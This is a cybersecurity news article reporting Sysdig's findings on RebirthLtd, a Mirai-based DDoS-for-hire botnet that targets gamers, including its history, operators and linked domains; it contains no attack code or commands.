Tuesday, June 25, 2024

DDoS-as-a-Service Botnet Backed by Mirai Attacking Gaming Community

DDoS-as-a-Service botnets are used by hackers to facilitate the most easily and cheaply launch of devastating distributed denial-of-service (DDoS) attacks.

Purposely, these botnets are made up of hacked devices that can be rented or leased to cause service disruptions or outages by flooding targets with high traffic volumes.

DDoS-as-a-Service is much easier for hackers looking for ways of extorting businesses, hurting others, and remaining anonymous.

Cybersecurity researchers at Sysdig Threat Research Team (TRT) recently discovered that DDoS-as-a-Service botnet is backed by Mirai attacking the gaming community.

DDoS-as-a-Service Botnet

The Sysdig Threat Research Team discovered that the “rebirthltd.com” domain was involved in a financially motivated and growing DDoS-as-a-Service botnet based on Mirai malware in March 2024. 

All-in-One Cybersecurity Platform for MSPs to provide full breach protection with a single tool, Watch a Full Demo 

This service, advertised via Telegram or an online shop, focuses mostly on the gaming community but also introduces risks for corporate entities. 

Mirai-derived botnet operators who are threat actors employ hacked devices to engage in massive distributed denial of service attacks targeting potential buyers, giving a glimpse into the changing world of cybercrime services that can stall business activities.

The Mirai malware sourced RebirthLtd for its botnet that delivers DDoS-as-a-Service and is marketed as a subscription service accessible through an online store and Telegram channel.

This is mainly focused on gamers who may have video game streamers or persons known as “trolls” who disrupt the whole gameplay process.

By operating under different hacking groups, some of whom are claimed to be part of this ring, including CazzG, supposedly a Chinese administrator, it represents one emerging illicit ecosystem that promotes the illegal sale of bots and DDoS tools using anonymity and simple access.

From where the RebirthLtd DDoS botnet came from can be traced to previous malware families and campaigns. Investigations show it to shop4youv2.de (Mirai was responsible for the FBI’s Operation PowerOFF) and Tsuki. army (advertising a second network of bots). 

Docx69 on TikTok under the moniker 'prixnuke' (Source - Sysdig)
Docx69 on TikTok under the moniker ‘prixnuke’ (Source – Sysdig)

Preliminary analysis from 2020 showed that “Rebirth” or “Vulcan” was an IoT-oriented botnet distinctively constructed on Gafgyt, QBot, and STDBot with known exploits. 

The fact that initial campaigns probably involved the developers of the botnet, since August 2022, people may have been drawn to the commercialized model of offering DDoS-as-a-service with a wider range of customers utilizing malicious capabilities by RebirthLtd. 

This change is proof that threat actors continuously repackage and sell malware strains.

An investigation of the RebirthLtd DDoS botnet revealed that it evolved from previous malware variants like Rebirth/Vulcan. The latter featured code similarities and common infrastructure connections such as to domains yosh[.]ltd and blkyosh[.]com.

Though the first campaigns in 2019-2020 must have largely involved its developers, multiple countries have recently been hit with massive attacks.

These payloads consist of malicious bash scripts trying to download and execute architecture-specific ELF files, sometimes by names of vulnerabilities or services.

The release of Mirai’s source code fueled a botnet industry and threats like Rebirth, reinforcing the need for diligent vulnerability management and runtime threat detection.

Get special offers from ANY.RUN Sandbox. Until May 31, get 6 months of free service or extra licenses. Sign up for free.


Latest articles

Hackers Attacking Windows IIS Server to Upload Web Shells

Windows IIS Servers often host critical web applications and services that provide a gateway...

WikiLeaks Founder Julian Assange Released in Stunning Deal with U.S.

WikiLeaks founder Julian Assange has been released from prison after reaching a deal with...

Four Members of FIN9 Hackers Charged for Attacking U.S. Companies

Four Vietnamese nationals have been charged for their involvement in a series of computer...

BREAKING: NHS England’s Synnovis Hit by Massive Cyber Attack

In a shocking development, the NHS has revealed that it was the victim of...

Threat Actor Claiming a 0-day in Linux LPE Via GRUB bootloader

A new threat actor has emerged, claiming a zero-day vulnerability in the Linux GRUB...

LockBit Ransomware Group Claims Hack of US Federal Reserve

The notorious LockBit ransomware group has claimed responsibility for hacking the U.S. Federal Reserve,...

Microsoft Power BI Vulnerability Let Attackers Access Organizations Sensitive Data

A vulnerability in Microsoft Power BI allows unauthorized users to access sensitive data underlying...
Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Free Webinar

API Vulnerability Scanning

71% of the internet traffic comes from APIs so APIs have become soft targets for hackers.Securing APIs is a simple workflow provided you find API specific vulnerabilities and protect them.In the upcoming webinar, join Vivek Gopalan, VP of Products at Indusface as he takes you through the fundamentals of API vulnerability scanning..
Key takeaways include:

  • Scan API endpoints for OWASP API Top 10 vulnerabilities
  • Perform API penetration testing for business logic vulnerabilities
  • Prioritize the most critical vulnerabilities with AcuRisQ
  • Workflow automation for this entire process

Related Articles